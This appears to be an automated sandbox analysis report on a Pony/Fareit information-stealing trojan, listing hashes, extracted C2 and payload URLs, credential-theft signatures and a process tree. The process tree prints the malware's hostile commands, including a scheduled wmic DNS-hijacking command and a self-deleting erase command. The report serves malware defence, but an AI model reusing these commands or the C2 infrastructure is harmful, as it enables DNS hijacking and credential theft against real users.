Analysis

  • max time kernel: 103s
  • max time network: 77s
  • platform: windows7_x64
  • resource: win7-20221111-en
  • resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted: 20/11/2022, 08:34

General

  • Target: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
  • Size: 81KB
  • MD5: 1535bd3f07b9163e3f8c1105318e4fa0
  • SHA1: bd6a3c48c57af869ab047d677b2e12623da2b2cf
  • SHA256: 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c
  • SHA512: d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5
  • SSDEEP: 1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy

Malware Config

Extracted

Family

pony

C2

http://voladex.pw:36/fix/mark.php

http://bolakes.pw:36/fix/refer.php

http://camtest33.pw:36/fix/symbols.php

Attributes

  • payload_url: http://camtest3.pw:36/fix/Sonar.exe

Signatures

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
    "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
      "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:328
        • C:\Windows\SysWOW64\at.exe
          at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
          4⤵
          PID:1812
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
          3⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:364
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 10 localhost
            4⤵
            • Runs ping.exe
            PID:924

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1476-54-0x0000000000400000-0x0000000000418000-memory.dmp (Filesize: 96KB)
  • memory/1476-55-0x0000000000400000-0x0000000000418000-memory.dmp (Filesize: 96KB)
  • memory/1476-56-0x0000000000400000-0x0000000000418000-memory.dmp (Filesize: 96KB)
  • memory/1476-60-0x0000000076161000-0x0000000076163000-memory.dmp (Filesize: 8KB)
  • memory/1476-61-0x0000000000400000-0x0000000000418000-memory.dmp (Filesize: 96KB)
  • memory/1476-62-0x0000000000400000-0x0000000000418000-memory.dmp (Filesize: 96KB)
  • memory/1476-67-0x0000000000400000-0x0000000000418000-memory.dmp (Filesize: 96KB)
  • memory/1724-58-0x0000000000400000-0x0000000000417000-memory.dmp (Filesize: 92KB)